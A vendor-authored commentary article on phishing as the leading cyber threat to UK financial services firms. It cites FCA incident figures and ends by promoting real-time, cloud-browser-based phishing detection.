Fast-growing phishing attacks represent the most common type of cybersecurity threat for financial services firms in the UK today, making up the bulk of attacks that strike banks, credit unions, credit-card lenders, insurance companies and other businesses that manage money.
Financial services firms reported 93 cyberattacks in 2018, according to data from by the Financial Conduct Authority (FCA), a financial services industry watchdog group based in London. This data grew out of a freedom of information request made by RSM, a network of global accounting firms. Just over half the attacks at financial services firms involved phishing, with 48 incidents reported in 2018, followed by 19 ransomware attacks. Other root causes for cyberattacks included malicious code (16 reported) and distributed denial of service attacks (10 reported).
Overall, the FCA said that financial services firms reported 819 total outages last year, with cyberattacks responsible for 11 per cent of the outages. In most cases the causes of the system outages were due to less devious actions than hacking, such as third-party failures (21 per cent), hardware and software problems (19 per cent), and glitches due to change management (18 per cent). However, RSM concluded that there was still a high level of under-reporting.
The spike in cyberincidents was due in part to the introduction of the EU’s General Data Protection Regulation (GDPR), which requires all organisations to report certain kinds of security breaches. Almost 60 per cent of the reported incidents affected retail banks (486). The FCA has called on all financial firms to develop better operational resilience to recover from disruptions, and to shore up their cybersecurity defences to prevent future attacks.
Of course, phishing is not just a serious threat for the financial industry in the UK alone, it’s happening worldwide. The FCA numbers highlight a much larger global concern that continues to morph and grow through clever new phishing techniques to target the financial sector worldwide. Phishing involves any scam in which an Internet user is tricked into revealing personal or confidential information that the scammer can then use for illicit purposes. Obviously, financial services firms offer an excellent target due to their troves of financial information.
A decreasing lifespan
These days, phishing attacks take on many forms beyond standard email links and attachments. Phishing can now be executed through social media feeds, search engines, browser extensions, pop-ups, chat bots, mobile apps, scareware, social engineering and malvertising.
HTML phishing can be delivered straight into browsers and apps, bypassing secure email gateways, next-generation antivirus endpoint security systems and advanced endpoint protections. These sneaky new attack vectors are capable of evading URL inspections and domain reputation analyses altogether.
“It is a major concern that a lot of firms seem to be trying to get the basics right on cyber,” FCA Executive Director Megan Butler said in a speech last November. Butler added that “only the largest firms have automated their detection systems to spot potential cyberattacks. Smaller firms are generally relying on old-school, manual processes – or no processes at all.”
This basic lack of protection is a big reason why phishing for data has become the first choice for the bad actors, who are becoming much more sophisticated. In most cases, employees can’t even spot the fakes, and traditional defences that rely on domain reputation and blacklists are not enough.
In addition, the lifespan of a phishing URL has decreased significantly in recent years. To evade detection, phishing crews can often gather valuable personal information and move on within 45 minutes. The bad guys know how current technologies are trying to catch them, so they have devised imaginative new strategies to evade detection. For instance, they can change domains and URLs fast enough so the blacklist-based engines cannot keep up. In other cases, malicious URLs might be hosted on compromised sites that have good domain reputations. Once people click on those sites, the attackers have already collected all the data they need within a few minutes and moved on.
By the time the security teams have caught up, those attacks are long gone and hosted somewhere else. Of the tens of thousands of new phishing sites that go live each day, the majority are hosted on compromised but otherwise legitimate domains. These sites would pass a domain reputation test, but they’re still hosting the malicious pages. Due to the fast-paced urgency of this threat, financial institutions should adopt a more modern approach to defend their data. This involves protections that can immediately determine the threat level in real-time and block the phishing hooks before they draw out valuable information.
This approach is based on advanced computer technologies that activate millions of virtual browsers in the cloud. In this way, sites can be inspected instantly by combining tools for computer vision, optical character recognition, natural language processing and active site behaviour analysis to “see” the actual site and the malicious code lurking within it. Such a real-time analysis can then be fed into machine learning algorithms to deliver a single definitive verdict: malicious or benign, with near zero false positives.
We know the phishing villains will continue to devise creative new ways of attacking the networks and employees of financial services firms. Guarding those assets will require equal amounts of creativity to stop these attacks before they can take effect.
Atif Mushtaq, CEO and founder, SlashNext